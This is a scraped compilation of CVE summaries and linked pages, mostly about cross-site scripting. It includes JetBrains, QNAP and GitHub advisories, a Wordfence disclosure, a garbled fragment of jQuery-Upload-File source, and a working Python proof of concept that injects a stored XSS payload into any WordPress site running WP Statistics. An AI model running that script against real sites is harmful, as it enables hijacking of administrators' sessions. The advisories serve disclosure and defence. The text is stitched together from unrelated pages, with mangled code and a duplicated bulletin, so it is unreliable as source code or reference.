A cross-site scripting (XSS) vulnerability in the fileNameStr parameter of jQuery-Upload-File v4.0.11 allows attackers to execute arbitrary web scripts or HTML via a crafted file with a Javascript payload in the file name.

").appendTo(this.statusbar).hide(); this.progressbar = $("

").appendTo(this.progressDiv); this.abort = $("

" + s.abortStr + "

").appendTo(this.statusbar).hide(); this.cancel = $("

" + s.cancelStr + "

").appendTo(this.statusbar).hide(); this.done = $("

" + s.doneStr + "

").appendTo(this.statusbar).hide(); this.download = $("

" + s.downloadStr + "

").appendTo(this.statusbar).hide(); this.del = $("

" + s.deleteStr + "

").appendTo(this.statusbar).hide(); this.abort.addClass("ajax-file-upload-red"); this.done.addClass("ajax-file-upload-green"); this.download.addClass("ajax-file-upload-green"); this.cancel.addClass("ajax-file-upload-red"); this.del.addClass("ajax-file-upload-red"); return this; } function createProgressDiv(obj, s) { var bar = null; if(s.customProgressBar) bar = new s.customProgressBar(obj,s); else bar = new defaultProgressBar(obj,s); bar.abort.addClass(obj.formGroup); bar.abort.addClass(s.abortButtonClass); bar.cancel.addClass(obj.formGroup); bar.cancel.addClass(s.cancelButtonClass); if(s.extraHTML) bar.extraHTML = $("

").insertAfter(bar.filename); if(s.uploadQueueOrder == 'bottom') $(obj.container).append(bar.statusbar); else $(obj.container).prepend(bar.statusbar); return bar; } function ajaxFormSubmit(form, s, pd, fileArray, obj, file) { var currentXHR = null; var options = { cache: false, contentType: false, processData: false, forceSync: false, type: s.method, data: s.formData, formData: s.fileData, dataType: s.returnType, headers: s.headers, beforeSubmit: function (formData, $form, options) { if(s.onSubmit.call(this, fileArray) != false) { if(s.dynamicFormData) { var sData = serializeData(s.dynamicFormData()); if(sData) { for(var j = 0; j < sData.length; j++) { if(sData\[j\]) { if(s.serialize && s.fileData != undefined) options.formData.append(sData\[j\]\[0\], sData\[j\]\[1\]); else options.data\[sData\[j\]\[0\]\] = sData\[j\]\[1\]; } } } } if(s.extraHTML) { $(pd.extraHTML).find("input,select,textarea").each(function(i,items) { if(s.serialize && s.fileData != undefined) options.formData.append($(this).attr('name'),$(this).val()); else options.data\[$(this).attr('name')\] = $(this).val(); }); } return true; } pd.statusbar.append("

" + s.uploadErrorStr + "

"); pd.cancel.show() form.remove(); pd.cancel.click(function () { mainQ.splice(mainQ.indexOf(form), 1); removeExistingFileName(obj, fileArray); pd.statusbar.remove(); s.onCancel.call(obj, fileArray, pd); obj.selectedFiles -= fileArray.length; //reduce selected File count updateFileCounter(s, obj); }); return false; }, beforeSend: function (xhr, o) { for (var key in o.headers) { xhr.setRequestHeader(key, o.headers\[key\]); } pd.progressDiv.show(); pd.cancel.hide(); pd.done.hide(); if(s.showAbort) { pd.abort.show(); pd.abort.click(function () { removeExistingFileName(obj, fileArray); xhr.abort(); obj.selectedFiles -= fileArray.length; //reduce selected File count s.onAbort.call(obj, fileArray, pd); }); } if(!feature.formdata) //For iframe based push { pd.progressbar.width('5%'); } else pd.progressbar.width('1%'); //Fix for small files }, uploadProgress: function (event, position, total, percentComplete) { //Fix for smaller file uploads in MAC if(percentComplete > 98) percentComplete = 98; var percentVal = percentComplete + '%'; if(percentComplete > 1) pd.progressbar.width(percentVal) if(s.showProgress) { pd.progressbar.html(percentVal); pd.progressbar.css('text-align', 'center'); } }, success: function (data, message, xhr) { pd.cancel.remove(); progressQ.pop(); //For custom errors. if(s.returnType == "json" && $.type(data) == "object" && data.hasOwnProperty(s.customErrorKeyStr)) { pd.abort.hide(); var msg = data\[s.customErrorKeyStr\]; s.onError.call(this, fileArray, 200, msg, pd); if(s.showStatusAfterError) { pd.progressDiv.hide(); pd.statusbar.append("ERROR: " + msg + ""); } else { pd.statusbar.hide(); pd.statusbar.remove(); } obj.selectedFiles -= fileArray.length; //reduce selected File count form.remove(); return; } obj.responses.push(data); pd.progressbar.width('100%') if(s.showProgress) { pd.progressbar.html('100%'); pd.progressbar.css('text-align', 'center'); } pd.abort.hide(); s.onSuccess.call(this, fileArray, data, xhr, pd); if(s.showStatusAfterSuccess) { if(s.showDone) { pd.done.show(); pd.done.click(function () { pd.statusbar.hide("slow"); pd.statusbar.remove(); }); } else { pd.done.hide(); } if(s.showDelete) { pd.del.show(); pd.del.click(function () { removeExistingFileName(obj, fileArray); pd.statusbar.hide().remove(); if(s.deleteCallback) s.deleteCallback.call(this, data, pd); obj.selectedFiles -= fileArray.length; //reduce selected File count updateFileCounter(s, obj); }); } else { pd.del.hide(); } } else { pd.statusbar.hide("slow"); pd.statusbar.remove(); } if(s.showDownload) { pd.download.show(); pd.download.click(function () { if(s.downloadCallback) s.downloadCallback(data, pd); }); } form.remove(); }, error: function (xhr, status, errMsg) { pd.cancel.remove(); progressQ.pop(); pd.abort.hide(); if(xhr.statusText == "abort") //we aborted it { pd.statusbar.hide("slow").remove(); updateFileCounter(s, obj); } else { s.onError.call(this, fileArray, status, errMsg, pd); if(s.showStatusAfterError) { pd.progressDiv.hide(); pd.statusbar.append("ERROR: " + errMsg + ""); } else { pd.statusbar.hide(); pd.statusbar.remove(); } obj.selectedFiles -= fileArray.length; //reduce selected File count } form.remove(); } }; if(s.showPreview && file != null) { if(file.type.toLowerCase().split("/").shift() == "image") getSrcToPreview(file, pd.preview); } if(s.autoSubmit) { form.ajaxForm(options); mainQ.push(form); submitPendingUploads(); } else { if(s.showCancel) { pd.cancel.show(); pd.cancel.click(function () { mainQ.splice(mainQ.indexOf(form), 1); removeExistingFileName(obj, fileArray); form.remove(); pd.statusbar.remove(); s.onCancel.call(obj, fileArray, pd); obj.selectedFiles -= fileArray.length; //reduce selected File count updateFileCounter(s, obj); }); } form.ajaxForm(options); } } return this; } }(jQuery));

CVE-2021-37504

In JetBrains Kotlin before 1.6.0, it was not possible to lock dependencies for Multiplatform Gradle Projects.

JetBrains Security

**JetBrains Security Bulletin Q4 2021**

In the fourth quarter of 2021, we resolved a number of security issues in our products. Here’s a summary report that contains a description of each issue and the version in which it was resolved.

**Product**

**Description**

**Severity**

**Resolved in**

**CVE/CWE**

Datalore

Another user’s database could be attached (DL-9779)

High

Not applicable

Not applicable

Hub

JetBrains Account integration exposed API keys with excessive permissions. Reported by Yurii Sanin (HUB-10958)

High

2021.1.13890

CVE-2022-24327

Hub

An unprivileged user could perform a DoS. Reported by Yurii Sanin (HUB-10976)

High

2021.1.13956

CVE-2022-24328

IntelliJ IDEA

Code could be executed without the user’s permission on opening a project (IDEA-243002, IDEA-277306, IDEA-282396, IDEA-275917)

Medium

2021.2.4

CVE-2022-24345

IntelliJ IDEA

Potential LCE via RLO (Right-to-Left Override) characters (IDEA-284150)

Medium

2021.3.1

CVE-2022-24346

JetBrains Blog

Blind SQL injection. Reported by Khan Janny (BLOG-45)

Medium

Not applicable

Not applicable

Kotlin

No ability to lock dependencies for Kotlin Multiplatform Gradle projects. Reported by Carter Jernigan (KT-49449)

Medium

1.6.0

CVE-2022-24329

Kotlin websites

Clickjacking at kotlinlang.org (KTL-588)

Medium

Not applicable

Not applicable

Remote Development

Unexpected open port on backend server. Please refer to this blog post for additional details. Reported by Damian Gwiżdż (GTW-894)

High

Not 2021.3.1

CVE-2021-45977

Space

Missing permission check in an HTTP API response (SPACE-15991)

High

Not applicable

Not applicable

TeamCity

A redirect to an external site was possible (TW-71113)

Low

2021.2.1

CVE-2022-24330

TeamCity

Logout failed to remove the “Remember Me” cookie (TW-72969)

Low

2021.2

CVE-2022-24332

TeamCity

GitLab authentication impersonation. Reported by Christian Pedersen (TW-73375)

High

2021.1.4

CVE-2022-24331

TeamCity

The “Agent push” feature allowed any private key on the server to be selected (TW-73399)

Low

2021.2.1

CVE-2022-24334

TeamCity

Blind SSRF via an XML-RPC call. Reported by Artem Godin (TW-73465)

Medium

2021.2

CVE-2022-24333

TeamCity

Time-of-check/Time-of-use (TOCTOU) vulnerability in agent registration via XML-RPC. Reported by Artem Godin (TW-73468)

High

2021.2

CVE-2022-24335

TeamCity

An unauthenticated attacker could cancel running builds via an XML-RPC request to the TeamCity server. Reported by Artem Godin (TW-73469)

Medium

2021.2.1

CVE-2022-24336

TeamCity

Pull-requests’ health items were shown to users without appropriate permissions (TW-73516)

Low

2021.2

CVE-2022-24337

TeamCity

Stored XSS. Reported by Yurii Sanin (TW-73737)

Medium

2021.2.1

CVE-2022-24339

TeamCity

URL injection leading to CSRF. Reported by Yurii Sanin (TW-73859)

Medium

2021.2.1

CVE-2022-24342

TeamCity

Changing a password failed to terminate sessions of the edited user (TW-73888)

Low

2021.2.1

CVE-2022-24341

TeamCity

XXE during the parsing of a configuration file (TW-73932)

Medium

2021.2.1

CVE-2022-24340

TeamCity

Reflected XSS (TW-74043)

Medium

2021.2.1

CVE-2022-24338

TeamCity

Stored XSS on the Notification templates page (JT-65752))

Low

2021.4.31698

CVE-2022-24344

YouTrack

A custom logo could be set with read-only permissions (JT-66214)

Low

2021.4.31698

CVE-2022-24343

YouTrack

Stored XSS via project icon. Reported by Yurii Sanin (JT-67176)

Medium

2021.4.36872

CVE-2022-24347

If you need any further assistance, please contact our Security Team.

Subscribe to receive the bulletin in your mailbox.

Your JetBrains Team_  
The Drive to Develop_

**Subscribe to Blog updates**

CVE-2022-24329: JetBrains Security Bulletin Q4 2021 | Company Blog

JetBrains YouTrack before 2021.4.36872 was vulnerable to stored XSS via a project icon.

JetBrains Security

**JetBrains Security Bulletin Q4 2021**

![Robert Demmer](https://blog.jetbrains.com/wp-content/uploads/2021/03/robert-200x200.png)

In the fourth quarter of 2021, we resolved a number of security issues in our products. Here’s a summary report that contains a description of each issue and the version in which it was resolved.

**Product**

**Description**

**Severity**

**Resolved in**

**CVE/CWE**

Datalore

Another user’s database could be attached (DL-9779)

High

Not applicable

Not applicable

Hub

JetBrains Account integration exposed API keys with excessive permissions. Reported by Yurii Sanin (HUB-10958)

High

2021.1.13890

CVE-2022-24327

Hub

An unprivileged user could perform a DoS. Reported by Yurii Sanin (HUB-10976)

High

2021.1.13956

CVE-2022-24328

IntelliJ IDEA

Code could be executed without the user’s permission on opening a project (IDEA-243002, IDEA-277306, IDEA-282396, IDEA-275917)

Medium

2021.2.4

CVE-2022-24345

IntelliJ IDEA

Potential LCE via RLO (Right-to-Left Override) characters (IDEA-284150)

Medium

2021.3.1

CVE-2022-24346

JetBrains Blog

Blind SQL injection. Reported by Khan Janny (BLOG-45)

Medium

Not applicable

Not applicable

Kotlin

No ability to lock dependencies for Kotlin Multiplatform Gradle projects. Reported by Carter Jernigan (KT-49449)

Medium

1.6.0

CVE-2022-24329

Kotlin websites

Clickjacking at kotlinlang.org (KTL-588)

Medium

Not applicable

Not applicable

Remote Development

Unexpected open port on backend server. Please refer to this blog post for additional details. Reported by Damian Gwiżdż (GTW-894)

High

Not 2021.3.1

CVE-2021-45977

Space

Missing permission check in an HTTP API response (SPACE-15991)

High

Not applicable

Not applicable

TeamCity

A redirect to an external site was possible (TW-71113)

Low

2021.2.1

CVE-2022-24330

TeamCity

Logout failed to remove the “Remember Me” cookie (TW-72969)

Low

2021.2

CVE-2022-24332

TeamCity

GitLab authentication impersonation. Reported by Christian Pedersen (TW-73375)

High

2021.1.4

CVE-2022-24331

TeamCity

The “Agent push” feature allowed any private key on the server to be selected (TW-73399)

Low

2021.2.1

CVE-2022-24334

TeamCity

Blind SSRF via an XML-RPC call. Reported by Artem Godin (TW-73465)

Medium

2021.2

CVE-2022-24333

TeamCity

Time-of-check/Time-of-use (TOCTOU) vulnerability in agent registration via XML-RPC. Reported by Artem Godin (TW-73468)

High

2021.2

CVE-2022-24335

TeamCity

An unauthenticated attacker could cancel running builds via an XML-RPC request to the TeamCity server. Reported by Artem Godin (TW-73469)

Medium

2021.2.1

CVE-2022-24336

TeamCity

Pull-requests’ health items were shown to users without appropriate permissions (TW-73516)

Low

2021.2

CVE-2022-24337

TeamCity

Stored XSS. Reported by Yurii Sanin (TW-73737)

Medium

2021.2.1

CVE-2022-24339

TeamCity

URL injection leading to CSRF. Reported by Yurii Sanin (TW-73859)

Medium

2021.2.1

CVE-2022-24342

TeamCity

Changing a password failed to terminate sessions of the edited user (TW-73888)

Low

2021.2.1

CVE-2022-24341

TeamCity

XXE during the parsing of a configuration file (TW-73932)

Medium

2021.2.1

CVE-2022-24340

TeamCity

Reflected XSS (TW-74043)

Medium

2021.2.1

CVE-2022-24338

TeamCity

Stored XSS on the Notification templates page (JT-65752))

Low

2021.4.31698

CVE-2022-24344

YouTrack

A custom logo could be set with read-only permissions (JT-66214)

Low

2021.4.31698

CVE-2022-24343

YouTrack

Stored XSS via project icon. Reported by Yurii Sanin (JT-67176)

Medium

2021.4.36872

CVE-2022-24347

If you need any further assistance, please contact our Security Team.

Subscribe to receive the bulletin in your mailbox.

Your JetBrains Team_  
The Drive to Develop_

CVE-2022-24347: JetBrains Security Bulletin Q4 2021 | JetBrains News

An authenticated user can upload an XML file containing an XSS via the ITSM module of EyesOfNetwork 5.3.11, resulting in a stored XSS.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-24612: /!\Security · Issue #114 · EyesOfNetworkCommunity/eonweb

A carefully crafted user preferences for submission could trigger an XSS vulnerability on Apache JSPWiki, related to the user preferences screen, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.2 or later.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-24948

It was discovered that the "Trigger DAG with config" screen was susceptible to XSS attacks via the `origin` query argument. This issue affects Apache Airflow versions 2.2.3 and below.

CVE-2021-45229

A cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running Proxy Server. If exploited, this vulnerability allows remote attackers to inject malicious code.
We have already fixed this vulnerability in the following versions of Proxy Server:
QTS 4.5.x: Proxy Server 1.4.2 ( 2021/12/30 ) and later


<< Back to Security Advisory List

*   **Release date:** February 25, 2022
*   **Security ID:** QSA-22-04
*   **Severity:** Medium
*   **CVE identifier:** CVE-2021-34359 | CVE-2021-34361
*   **Affected products:** QNAP NAS running Proxy Server
*   **Status:** Resolved

**Summary**

Cross-site scripting (XSS) vulnerabilities have been reported to affect QNAP NAS running Proxy Server. If exploited, this vulnerability allows remote attackers to inject malicious code.

We have already fixed this vulnerability in the following versions of Proxy Server:

*   QTS 4.5.x: Proxy Server 1.4.2 (2021/12/30) and later

**Recommendation**

To fix the vulnerabilities, we recommend updating Proxy Server to the latest version.

**Updating Proxy Server**

1.  Log on to QTS as administrator.
2.  Open the **App Center** and then click ![](https://www.qnap.com/i/_upload/support/images/magnifier.png).  
    A search box appears.
3.  Enter "Proxy Server".  
    Proxy Server appears in the search results.
4.  Click **Update**.  
    A confirmation message appears.  
    **Note:** The **Update** button is not available if your application is already up to date.
5.  Click **OK**.  
    The application is updated.

**Acknowledgements:** Tony Martin, a security researcher

**Revision History:** V1.0 (February 25, 2022) - Published

CVE-2021-34361: XSS Vulnerabilities in Proxy Server - Security Advisory

@awsui/components-react is the main AWS UI package which contains React components, with TypeScript definitions designed for user interface development. Multiple components in versions before 3.0.367 have been found to not properly neutralize user input and may allow for javascript injection. Users are advised to upgrade to version 3.0.367 or later. There are no known workarounds for this issue.

**Multiple components could allow cross-site scripting (XSS) in @awsui/components-react in certain circumstances**

High

fralongo published GHSA-mf22-92pm-m8p8

Feb 24, 2022

**Package**

npm @awsui/components-react (npm)

**Affected versions**

< 3.0.367

**Description**

**Impact**

Components could potentially allow cross-site scripting (XSS) in certain circumstances. These components could render content without adequate neutralization.

**Patches**

Fixed in 3.0.367.

**CWEs**

**CVSS Score**

8.8 High

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-24709: Build software better, together

The WP Statistics WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the platform parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers to inject arbitrary web scripts onto several pages that execute when site administrators view a sites statistics, in versions up to and including 13.1.5.

WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting in platform

Exploit Title

WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting

Exploit Author

Muhammad Zeeshan (Xib3rR4dAr)

Date

February 13, 2022

Plugin Link

WP-Statistics

Plugin Active Installations

600,000+

Version

13.1.5 (Latest)

Tested on

Wordpress 5.9

Vulnerable Endpoint

/wp-json/wp-statistics/v2/hit

Vulnerable File

/wp-content/plugins/wp-statistics/includes/class-wp-statistics-hits.php and others

Vulnerable Parameters

platform

Google Dork

inurl:/wp-content/plugins/wp-statistics

CVE

N/A

**Proof of Concept**

unauthenticated\_stored\_xss\_platform\_poc.py

import requests, re, json, urllib.parse
from random import randint

wpurl           \=   input('\\nWordPress URL: ')
payload         \=   input('\\nPayload: ')

wp\_session      \=   requests.session()

wp              \=   wp\_session.get(wpurl)
wp\_nonce        \=   re.search(r'\_wpnonce=(.\*?)&wp\_statistics\_hit', wp.text).group(1)

headers         \=   {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 12\_2\_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}

payload         \=   urllib.parse.quote\_plus(payload)
random\_ip \= '.'.join(\[str(randint(0,255)) for x in range(4)\])
exploit         \=   f'/wp-json/wp-statistics/v2/hit?\_=11&\_wpnonce={wp\_nonce}&wp\_statistics\_hit\_rest=&browser=Chrome&platform={payload}&version=&referred=&ip={random\_ip}&exclusion\_match=no&exclusion\_reason&ua=Something&track\_all=1&timestamp=11&current\_page\_type=home&current\_page\_id=0&search\_query&page\_uri=/&user\_id=0'
exploit\_url     \=   wpurl+exploit

print(f'\\nSending XSS payload: {exploit\_url}')

wp              \=   wp\_session.get(exploit\_url, headers\=headers)
data            \=   wp.json()

print("\\nResponse: \\n" + json.dumps(data, sort\_keys\=True, indent\=4))

print(f'\\nXSS will trigger when admin views platforms of vistors at {wpurl}/wp-admin/admin.php?page=wps\_visitors\_page or other pages')

![image](https://user-images.githubusercontent.com/24238512/154224398-8f449ba5-98a2-4c7c-9854-d11aebbaa5a7.png)

CVE-2022-25307: WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting in platform

The Header Footer Code Manager plugin <= 1.1.16 for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) via the $_REQUEST['page'] parameter.

On February 15, 2022, the Wordfence Threat Intelligence team responsibly disclosed a reflected Cross-Site Scripting (XSS) vulnerability in Header Footer Code Manager, a WordPress plugin with over 300,000 installations.

The plugin publisher quickly acknowledged our initial contact and we sent the full disclosure details the same day, on February 15, 2022. A patched version, 1.1.17, was implemented a few days later and made available on February 18, 2022.

Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule to protect against this vulnerability on February 15, 2022. Sites still running the free version of Wordfence are partially protected against this exploit by our built-in XSS rule, but will receive full protection 30 days later, on March 17, 2022.

**Description:** Reflected Cross-Site Scripting  
**Affected Plugin:** Header Footer Code Manager  
**Plugin Slug:** header-footer-code-manager  
**Plugin Developer:** 99robots  
**Affected Versions:** <= 1.1.16  
**CVE ID:** CVE-2022-0710  
**CVSS Score:** 6.1 (Medium)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
**Researcher/s:** Ramuel Gall  
**Fully Patched Version:** 1.1.17

Header Footer Code Manager is a WordPress plugin designed to allow administrators to add code snippets to the header or footer of a website. One of the admin panel pages added by the plugin allows administrators to view a list of code snippets that had been added to the site, which included links to edit or delete these existing code snippets. The plugin’s column\_name function used the `$_REQUEST[‘page’]` parameter to construct this link.

WordPress uses the value of the `$_GET[‘page’]` parameter in order to determine which page the user is currently visiting, and will block unauthorized users if they’re not allowed to access the current page set in `$_GET[‘page’]`. This means that `$_REQUEST[‘page’]` might be expected to just contain the admin page used to display the list of code snippets, `hfcm-list`. However, due to a quirk of how PHP handles superglobal variables, `$_REQUEST` parameters can be overloaded.

PHP populates the `$_REQUEST` superglobal variable from `$_GET`, `$_POST`, and `$_COOKIE`. That means that normally, if a `$_GET[‘page’]` parameter is sent, `$_REQUEST[‘page’]` will be populated with the value of `$_GET[‘page’]`. In most PHP configurations, however, the `request_order` (or `variables_order` if `request_order` is not set) means that if a request is sent with both a `$_GET[‘page’]` parameter _and_ a `$_POST[‘page’]` parameter, the value of `$_REQUEST[‘page’]` is set to the value of `$_POST[‘page’]`.

The upshot is that this can be used to execute JavaScript in the browser of a logged-in administrator, for instance, by tricking them into visiting a self-submitting form that sends a POST request to e.g. hxxps://victimsite.site/wp-admin/admin.php?page=hfcm-list, with the `$_POST[‘page’]` parameter set to malicious JavaScript.

The `$_GET[‘page’]` parameter means that WordPress will route the victim to the correct page, and then the value of `$_REQUEST[‘page’]` (which in nearly all configurations will be set to the value of `$_POST[‘page’]`) will get echoed out onto the page.

Most XSS can be used to perform actions using an administrator’s session, which includes the ability to create malicious administrators and in some cases add backdoors. Additionally, this particular plugin is used to add code to a site, so an attacker could also potentially leverage reflected XSS into stored XSS to attack site visitors, even on sites where file editing and user creation functionality was locked down.

**Timeline**

**February 15, 2022** – The Wordfence Threat Intelligence team finishes our investigation and releases a firewall rule to Wordfence Premium, Care, and Response users to protect against any exploits targeting this vulnerability. We initiate the responsible disclosure process and receive a response from the plugin’s developers. We send over full disclosure.  
**February 17, 2022** – Plugin changelog shows the issue is fixed.  
**February 18, 2022** – A patched version of the plugin, 1.1.17, is released on the WordPress repo.  
**March 17, 2022** – The firewall rule becomes available to free Wordfence users.

**Conclusion**

In today’s article, we discussed a reflected XSS vulnerability in Header Footer Code Manager. While this would require tricking an administrator into clicking a link or performing some other action, it still offers the potential for site takeover. As such we urge you to update to the latest version of this plugin, 1.1.17 as of this writing, as soon as possible.

Sites running Wordfence Premium, Wordfence Care, and Wordfence Response are fully protected against this vulnerability. Sites running the free version of Wordfence are partially protected and will receive full protection on March 17, 2022.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected, as this is a serious vulnerability that can lead to complete site takeover.

_Thanks to Charlie Patel, CEO of 99robots, for rapidly and personally responding to our disclosure_

Tag

#xss